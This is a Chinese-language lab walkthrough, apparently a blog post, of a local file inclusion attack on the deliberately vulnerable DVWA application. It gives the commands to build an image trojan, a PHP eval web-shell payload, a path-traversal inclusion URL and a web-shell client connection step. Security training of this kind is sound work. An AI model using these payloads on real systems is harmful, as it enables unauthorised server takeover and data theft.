35、本地文件包含漏洞

简介: 35、本地文件包含漏洞

一、本地文件包含漏洞:


环境:DVWA,low级别


1、制作一句话图片木马

0a2653c851af460fa595bd959398a8f1.png

第一种方法:


windows命令


copy 1.jpg/b+1.php 2.jpg


第二种方法:


将照片拖入edjpgcom软件,添加下面这句话


<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

0a2653c851af460fa595bd959398a8f1.png

2、上传图片木马文件

0eacb84100b54626af849e6b562bf92a.png

3、选择文件包含页面

2d65d23f6d4748949b924e4057485923.png

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/1.jpg

2e9b90b2ca334476abebe75bafe6eeaa.png


5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

4cebaac233b3433da32a72337a77fc60.png

6、菜刀链接

6de278e6d6694ce5bb08e7e842b7e74b.png

7a399525ddec4b77923c464820b33738 (1).png


二、环境:DVWA,medium级别


同low级别


禁止非法,后果自负


目录
相关文章
|
6月前
|
安全 PHP
36、远程文件包含漏洞
36、远程文件包含漏洞
36 0
|
6月前
|
安全 网络安全
明御安全网关任意文件上传漏洞
安恒信息明御安全网关(以下简称“NGFW”)秉持安全可视、简单有效的理念,以资产为视角,构建“事前+事中+事后”全流程防御的下一代安全防护体系,并融合传统防火墙、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。
223 1
|
监控 算法 Java
记一次从任意文件下载到getshell
记一次从任意文件下载到getshell
133 0
|
SQL Web App开发 安全
Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取
Smanga存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
292 0
替换文件中的敏感信息
假设我们有一份文件,文件中包含了很多个人信息。现在需要一份去除其中敏感信息的版本,将文件中所有手机号的4~7位和身份证号的6~15位用 * 替换。
|
编解码 安全 Shell
CVE-2017-9993ffmpeg 任意文件读取漏洞环境
漏洞描述 2.8.12之前的FFmpeg、3.1.9之前的3.0.x和3.1.x、3.2.6之前的3.2.x和3.3.2之前的3.3.x未正确限制HTTP Live Streaming文件扩展名和解复用器名称,这允许攻击者通过特制的播放列表数据读取任意文件。 环境搭建可以查看我的这篇文章 https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.8.22fb3e18sKKMLR 目录为 /vulhub-master/ffmpeg/phdays 运行命令 ```sh docker-compose
466 0
 CVE-2017-9993ffmpeg 任意文件读取漏洞环境
|
安全
CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞
XenMobile提供了一种可靠的移动设备管理解决方案,可以对企业设备和员工个人设备进行基于角色的管理、配置和支持并确保安全性。与只能提供基本设备管理软件的大多数厂商不同,XenMobile可提供多种高级功能和特性来确保移动应用可随时用于业务目的并确保移动内容安全性,如区域防护(geo-fencing)、自动化合规性及一键式实时聊天和支持等。
101 0
CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞
|
Java 数据安全/隐私保护 C++
windows环境实现批量加密文件,并创建加密文件同名(不带后缀)的文件夹,然后把加密文件和图片和文本放入这个文件夹。
windows环境实现批量加密文件,并创建加密文件同名(不带后缀)的文件夹,然后把加密文件和图片和文本放入这个文件夹。
231 0
windows环境实现批量加密文件,并创建加密文件同名(不带后缀)的文件夹,然后把加密文件和图片和文本放入这个文件夹。
|
安全 数据库
目录遍历漏洞和文件读取漏洞的区别
通过操作URL强行访问web目录以外的文件,目录和命令。网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以为进一步入侵网站做准备。
359 0